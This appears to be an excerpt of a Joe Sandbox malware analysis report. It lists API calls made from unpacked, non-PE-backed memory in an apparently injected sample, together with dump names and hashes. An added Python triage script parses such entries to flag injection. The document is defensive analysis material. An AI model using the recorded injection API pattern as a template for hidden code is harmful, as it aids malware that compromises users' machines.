                                                                        • Instruction ID: 40537e5586aae8fb081e6c35c7aee01362ff77269fda0b6b61d2258f6cd03bc2
                                                                        • Opcode Fuzzy Hash: 757e69e53c19375e7b38d73c382097650b9ad573f0673c20a44de219923050da
                                                                        • Instruction Fuzzy Hash: F090027120100817F1C17159441468A0045D7D1345F91C525A151A774DCA55EA5D77E1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.496537518.0000000004840000.00000040.00000001.sdmp, Offset: 04840000, based on PE: true
                                                                        • Associated: 00000007.00000002.497194680.000000000495B000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.497207612.000000000495F000.00000040.00000001.sdmp
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 63805b4bca45ca385691e3f54ee5fd72b96488e75cb6b51218ea4ed26a4d0870
                                                                        • Instruction ID: 36e45550271722845db51a3d5fcc56d9d589c6e423b1abacd2ae1f21525f662b
                                                                        • Opcode Fuzzy Hash: 63805b4bca45ca385691e3f54ee5fd72b96488e75cb6b51218ea4ed26a4d0870
                                                                        • Instruction Fuzzy Hash: F390026921300017F1C17159541864A0045D7D1246F91D925A150A678CC955E86D63A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.496537518.0000000004840000.00000040.00000001.sdmp, Offset: 04840000, based on PE: true
                                                                        • Associated: 00000007.00000002.497194680.000000000495B000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.497207612.000000000495F000.00000040.00000001.sdmp
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: b6969c8e3eb4a16c0c5e178e2951653bb89a204d6d0c814bdc7d5c7a7b93b7be
                                                                        • Instruction ID: 13380171af4aed83a7489d6ad10c0f6e9f7bb848b92d25196e8832602e001246
                                                                        • Opcode Fuzzy Hash: b6969c8e3eb4a16c0c5e178e2951653bb89a204d6d0c814bdc7d5c7a7b93b7be
                                                                        • Instruction Fuzzy Hash: E790027131114417F151615984147460045D7D1245F51C921A1D19678DC6D5E89571A2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.496537518.0000000004840000.00000040.00000001.sdmp, Offset: 04840000, based on PE: true
                                                                        • Associated: 00000007.00000002.497194680.000000000495B000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.497207612.000000000495F000.00000040.00000001.sdmp
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: d9d719abe08500029a58f27d0b464eeec5953810229d3fda97efba1e554162ba
                                                                        • Instruction ID: 03e6a3e67f965b2f26a5686bec4f069910b33f357b8bf672861c661efc64cd53
                                                                        • Opcode Fuzzy Hash: d9d719abe08500029a58f27d0b464eeec5953810229d3fda97efba1e554162ba
                                                                        • Instruction Fuzzy Hash: B190027120100417F141659954186860045D7E0345F51D521A6519675EC6A5E89571B1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • Sleep.KERNELBASE(000007D0), ref: 00626F88
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Sleep
                                                                        • String ID: net.dll$wininet.dll
                                                                        • API String ID: 3472027048-1269752229
                                                                        • Opcode ID: c15d1128f69f8fabc85da509739f323c0425849fb4ad6a3d3ce67de80eef41de
                                                                        • Instruction ID: 58959252372799c7647bfebad579be89104f96b2eeb65b583c8f3e036d89537f
                                                                        • Opcode Fuzzy Hash: c15d1128f69f8fabc85da509739f323c0425849fb4ad6a3d3ce67de80eef41de
                                                                        • Instruction Fuzzy Hash: A03190B1601704ABC711DF64E8A1FA7B7BAAB88700F10851DF61AAB241D770B545CFE4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00613B93), ref: 006284FD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FreeHeap
                                                                        • String ID: .z`
                                                                        • API String ID: 3298025750-1441809116
                                                                        • Opcode ID: 1588351900f1f7f15cd1f66ade8d6688544561854e9805eda088ec6d4a5c407c
                                                                        • Instruction ID: dd47f6922bb5f0109a2779bbee5c49ef518756932901d3898aa3db61283772db
                                                                        • Opcode Fuzzy Hash: 1588351900f1f7f15cd1f66ade8d6688544561854e9805eda088ec6d4a5c407c
                                                                        • Instruction Fuzzy Hash: F9F084B92856606FCB10DFB8AC40EEB7B98DF80354F04069DF84D97283C631DA16CAA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00613B93), ref: 006284FD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FreeHeap
                                                                        • String ID: .z`
                                                                        • API String ID: 3298025750-1441809116
                                                                        • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                        • Instruction ID: d0b98c7f1114d988aa512379be9cb069d2ccc4fa11d8daf887a1a868b7e2a9ea
                                                                        • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                        • Instruction Fuzzy Hash: E1E04FB12002146FD714DF59DC45EA777ADEF88750F014558FD0857282CA30F914CAF0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 006172BA
                                                                        • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 006172DB
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: MessagePostThread
                                                                        • String ID:
                                                                        • API String ID: 1836367815-0
                                                                        • Opcode ID: 8b955aa86635726f2346a9c8d52cc1bf7f5856a12dc46368d73d443070a20bca
                                                                        • Instruction ID: 293c5203fd3a1744eee1a48ee0325cc93c0c5f553cad5b3f3b0ef9aac7b51dcc
                                                                        • Opcode Fuzzy Hash: 8b955aa86635726f2346a9c8d52cc1bf7f5856a12dc46368d73d443070a20bca
                                                                        • Instruction Fuzzy Hash: A301A731E8062877E760A6949C03FFE776D9F40B50F550119FF04BA1C1E6A46A0647F9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00619B92
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Load
                                                                        • String ID:
                                                                        • API String ID: 2234796835-0
                                                                        • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                        • Instruction ID: 2db8f2599fc8cbdcfeadd6a3d96579dc5206adc6f0249e993f206a5f3492b4ad
                                                                        • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                        • Instruction Fuzzy Hash: 51011EB5D0020DABDF10DAE4EC56FDEB7B99B54308F044199A90897241F671EB54CBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00628594
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateInternalProcess
                                                                        • String ID:
                                                                        • API String ID: 2186235152-0
                                                                        • Opcode ID: ac0493af3a74a3912627a04ca982c19317b969df5bdb95e380e847bb80063fc4
                                                                        • Instruction ID: 863e1c05346953545aff126c8ecdaa1cce0630a8badb9d0eb0fe6b58a0d7afd2
                                                                        • Opcode Fuzzy Hash: ac0493af3a74a3912627a04ca982c19317b969df5bdb95e380e847bb80063fc4
                                                                        • Instruction Fuzzy Hash: B301AFB2211108AFCB58DF89DC80EEB77ADAF8C754F158258FA0D97241DA30ED51CBA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00628594
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateInternalProcess
                                                                        • String ID:
                                                                        • API String ID: 2186235152-0
                                                                        • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                        • Instruction ID: bfe3cfebda80431fa11c78a7d21dc3710cca8fc4e21fc3ddde322e9f2f887241
                                                                        • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                        • Instruction Fuzzy Hash: D201AFB2210108AFCB54DF89DC80EEB77ADAF8C754F158258FA0D97241CA30E851CBA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0061CCD0,?,?), ref: 0062704C
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateThread
                                                                        • String ID:
                                                                        • API String ID: 2422867632-0
                                                                        • Opcode ID: a03de2c26fde9edebd994b17b2fbdab19bffd88354ae8aee89042dbd2221a61e
                                                                        • Instruction ID: b669531c55a304b0559ff523514194c61910933e958bb066e6b6776b96f14116
                                                                        • Opcode Fuzzy Hash: a03de2c26fde9edebd994b17b2fbdab19bffd88354ae8aee89042dbd2221a61e
                                                                        • Instruction Fuzzy Hash: 64F0EC722407143BD3302968AC03FD3735DCF81B20F640019F7496B2C1C595B80686A5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0061CCD0,?,?), ref: 0062704C
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateThread
                                                                        • String ID:
                                                                        • API String ID: 2422867632-0
                                                                        • Opcode ID: e8a682d6ca176058e0d851ff1510c3e9173edc0f8f67161c925dea0b5d29092c
                                                                        • Instruction ID: 98dbf9aeb43f2365fc0c301f0e68d03f3ea096605e101ea02b13a58a444dd9ca
                                                                        • Opcode Fuzzy Hash: e8a682d6ca176058e0d851ff1510c3e9173edc0f8f67161c925dea0b5d29092c
                                                                        • Instruction Fuzzy Hash: 24E06D733906243AE2306599AC02FE7B39D9B81B20F55002AFA4DEA2C1D595F80546A9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,0061CFA2,0061CFA2,?,00000000,?,?), ref: 00628660
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: LookupPrivilegeValue
                                                                        • String ID:
                                                                        • API String ID: 3899507212-0
                                                                        • Opcode ID: 105afae014c65a98590c25a1c39cd63531488898901e4997d413f97cf68f2f65
                                                                        • Instruction ID: 8005dd9675da94259b7e548dada43754992199fa22195ae6fe3b8a4c353c0e17
                                                                        • Opcode Fuzzy Hash: 105afae014c65a98590c25a1c39cd63531488898901e4997d413f97cf68f2f65
                                                                        • Instruction Fuzzy Hash: EAE092365016146FE620EBA8AC48DEB776DDF84360F418955FD1D97242C536D9148A90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • RtlAllocateHeap.NTDLL(00623516,?,00623C8F,00623C8F,?,00623516,?,?,?,?,?,00000000,00000000,?), ref: 006284BD
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateHeap
                                                                        • String ID:
                                                                        • API String ID: 1279760036-0
                                                                        • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                        • Instruction ID: ed9103a06210a472e35c188e5fc393aced9099954f5f8a0cb5ed04b9a55e1d5d
                                                                        • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                        • Instruction Fuzzy Hash: F0E012B1200218ABDB14EF99DC41EA777ADAF88650F118958FA085B282CA30F9148AB0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,0061CFA2,0061CFA2,?,00000000,?,?), ref: 00628660
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: LookupPrivilegeValue
                                                                        • String ID:
                                                                        • API String ID: 3899507212-0
                                                                        • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                        • Instruction ID: 83c4ae5a33f9b5a5aaa2c8261d203a6c34e35e44e45661c47da1fa68c5faeda6
                                                                        • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                        • Instruction Fuzzy Hash: DBE01AB12002186BDB10DF49DC85EE737ADAF88650F018554FA0857282C930E8148BF5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • SetErrorMode.KERNELBASE(00008003,?,?,00617C63,?), ref: 0061D43B
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorMode
                                                                        • String ID:
                                                                        • API String ID: 2340568224-0
                                                                        • Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                        • Instruction ID: 5b842d6d77eb53631344f3d98652477c779c278e5e817049a955121892dbf140
                                                                        • Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                        • Instruction Fuzzy Hash: BDD0A7717503043BE610FBA89C03FA632CD5B54B00F494064F989D73C3DA64F5004565
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.496537518.0000000004840000.00000040.00000001.sdmp, Offset: 04840000, based on PE: true
                                                                        • Associated: 00000007.00000002.497194680.000000000495B000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.497207612.000000000495F000.00000040.00000001.sdmp
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: e35fcc49e831cdffd9aebff73aa44c87a9b41adb18b039d637b184505af462b5
                                                                        • Instruction ID: 8dddcfe163df2d7c0c8a367a3ea162ad29dd2c3f80f4b5aa3fb0526459b4a1ce
                                                                        • Opcode Fuzzy Hash: e35fcc49e831cdffd9aebff73aa44c87a9b41adb18b039d637b184505af462b5
                                                                        • Instruction Fuzzy Hash: 00B02BB18010C0CAF701D76006087173900BBC0300F17C921D2024350A4378E090F1F1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%
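The function entries above are all cut from the same pattern: one or more API call sites, the memory dump the code was found in, and a similarity block. The field that matters most for triage is "based on PE: false" on the 0x610000 dumps: every call in those entries (PostThreadMessageW, LdrLoadDll, CreateProcessInternalW, CreateThread, LookupPrivilegeValueW, RtlAllocateHeap, SetErrorMode) is made from memory that no loaded image accounts for, which is what the injection and process-hollowing signatures at the top of the report are built on. The following Python is an added example, not part of the report or of Joe Sandbox: it parses a text export of these entries (a constructed sample below reuses lines from this page), decodes the dump file name, and groups API names by non-PE-backed region. The dump-name field layout (pid.stage.id.base.protection.type.sdmp) is an assumption inferred from the names in this report; the PAGE_* values are the documented Windows constants.

```python
"""Parse Joe Sandbox 'function' entries (APIs / Memory Dump Source /
Similarity blocks of a text-exported report) and flag API calls made from
memory regions that are not backed by a PE image. Added example; not part
of the report and not Joe Sandbox code."""
import re
from dataclasses import dataclass, field

# One call-site bullet, e.g. "• CreateThread.KERNELBASE(00000000,...), ref: 0062704C".
# Entries without an argument list ("• ...@Z.LIBCMT ref: 048FFDFA") also occur.
API_RE = re.compile(
    r"^•\s*(?P<api>\S+?)\.(?P<module>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
SRC_RE = re.compile(
    r"^•\s*Source File:\s*(?P<file>\S+\.sdmp),\s*Offset:\s*(?P<offset>[0-9A-Fa-f]+),"
    r"\s*based on PE:\s*(?P<pe>true|false)$")
SCORE_RE = re.compile(r"^Uniqueness Score:\s*(?P<score>-?[\d.]+)%$")

# Documented Windows memory-protection constants.
PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x10: "PAGE_EXECUTE",
                0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}

# Constructed sample: three entries copied from this report's function list.
SAMPLE = """\
APIs
• PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 006172BA
• PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 006172DB
Memory Dump Source
• Source File: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false
Yara matches
Similarity
• API ID: MessagePostThread
• String ID:
• API String ID: 1836367815-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00628594
Memory Dump Source
• Source File: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false
Similarity
• API ID: CreateInternalProcess
Uniqueness

Uniqueness Score: -1.00%

APIs
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 048FFDFA
Strings
• RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 048FFE01
Memory Dump Source
• Source File: 00000007.00000002.496537518.0000000004840000.00000040.00000001.sdmp, Offset: 04840000, based on PE: true
Similarity
• API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
Uniqueness

Uniqueness Score: -1.00%
"""

@dataclass
class ApiCall:
    api: str
    module: str
    args: list
    ref: int          # call-site address inside the dumped region

@dataclass
class FunctionEntry:
    calls: list = field(default_factory=list)
    strings: list = field(default_factory=list)
    source_file: str = ""
    offset: int = 0
    pe_backed: bool = True
    api_id: str = ""
    score: float = None

SECTIONS = ("Strings", "Memory Dump Source", "Yara matches", "Similarity", "Uniqueness")

def parse_report(text):
    """Walk the export line by line; an entry starts at 'APIs' and ends at its
    'Uniqueness Score' line, so decompiled code between entries is ignored."""
    entries, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur, section = FunctionEntry(), "apis"
            entries.append(cur)
            continue
        if cur is None:
            continue
        if line in SECTIONS:
            section = line
            continue
        if (m := SCORE_RE.match(line)):
            cur.score = float(m.group("score"))
            cur, section = None, None
        elif section == "apis" and (m := API_RE.match(line)):
            args = m.group("args").split(",") if m.group("args") is not None else []
            cur.calls.append(ApiCall(m.group("api"), m.group("module"), args, int(m.group("ref"), 16)))
        elif section == "Strings" and line.startswith("•"):
            cur.strings.append(line[1:].strip())
        elif section == "Memory Dump Source" and (m := SRC_RE.match(line)):
            cur.source_file = m.group("file")
            cur.offset = int(m.group("offset"), 16)
            cur.pe_backed = m.group("pe") == "true"
        elif section == "Similarity" and line.startswith("• API ID:"):
            cur.api_id = line.split(":", 1)[1].strip()
    return entries

def decode_dump_name(name):
    """Split an .sdmp name into fields. Layout pid.stage.id.base.protection.type
    is an ASSUMPTION inferred from the names in this report."""
    fields = name[:-len(".sdmp")].split(".")
    if len(fields) != 6:
        raise ValueError(f"unexpected dump name: {name}")
    protect = int(fields[4], 16)
    return {"pid": int(fields[0], 16), "base": int(fields[3], 16),
            "protect": PAGE_PROTECT.get(protect, hex(protect))}

def unbacked_api_calls(entries):
    """API names per region for code that no PE image backs: such code is
    unpacked or injected, which is the basis of the report's injection signatures."""
    by_region = {}
    for e in entries:
        if e.pe_backed or not e.calls:
            continue
        info = decode_dump_name(e.source_file)
        key = (info["pid"], info["base"], info["protect"])
        by_region.setdefault(key, set()).update(c.api for c in e.calls)
    return {k: sorted(v) for k, v in by_region.items()}

if __name__ == "__main__":
    for (pid, base, prot), apis in unbacked_api_calls(parse_report(SAMPLE)).items():
        print(f"pid {pid} region {base:#x} ({prot}): {', '.join(apis)}")
```

Run against a full text export instead of SAMPLE and the output is a per-region list of everything the injected code calls, which is a more useful starting point for a detection or a YARA rule than the per-function view above. The "ref" addresses are kept as integers so they can be rebased against the region's Offset when cross-referencing the dump itself.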

                                                                        Non-executed Functions

                                                                        C-Code - Quality: 53%
                                                                        			E048FFDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                                        				void* _t7;
                                                                        				intOrPtr _t9;
                                                                        				intOrPtr _t10;
                                                                        				intOrPtr* _t12;
                                                                        				intOrPtr* _t13;
                                                                        				intOrPtr _t14;
                                                                        				intOrPtr* _t15;
                                                                        
                                                                        				_t13 = __edx;
                                                                        				_push(_a4);
                                                                        				_t14 =  *[fs:0x18];
                                                                        				_t15 = _t12;
                                                                        				_t7 = E048ACE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                                        				_push(_t13);
                                                                        				E048F5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                                        				_t9 =  *_t15;
                                                                        				if(_t9 == 0xffffffff) {
                                                                        					_t10 = 0;
                                                                        				} else {
                                                                        					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                                        				}
                                                                        				_push(_t10);
                                                                        				_push(_t15);
                                                                        				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                                        				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                                        				return E048F5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                                        			}

                                                                        APIs
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 048FFDFA
                                                                        Strings
                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 048FFE01
                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 048FFE2B
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.496537518.0000000004840000.00000040.00000001.sdmp, Offset: 04840000, based on PE: true
                                                                        • Associated: 00000007.00000002.497194680.000000000495B000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.497207612.000000000495F000.00000040.00000001.sdmp
                                                                        Similarity
                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                        • API String ID: 885266447-3903918235
                                                                        • Opcode ID: e720798892b94897e7df4a037a0d6817c4a6365fc405b74644dfdefed477656b
                                                                        • Instruction ID: fa3096ad616900e4404a3f20a1ebabfe47189147e5b558c65d43146db1be5e67
                                                                        • Opcode Fuzzy Hash: e720798892b94897e7df4a037a0d6817c4a6365fc405b74644dfdefed477656b
                                                                        • Instruction Fuzzy Hash: 68F0FC32640501BFE6201A45DC01F237F5ADB44730F140715F714955E1EAA2F8309AF5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%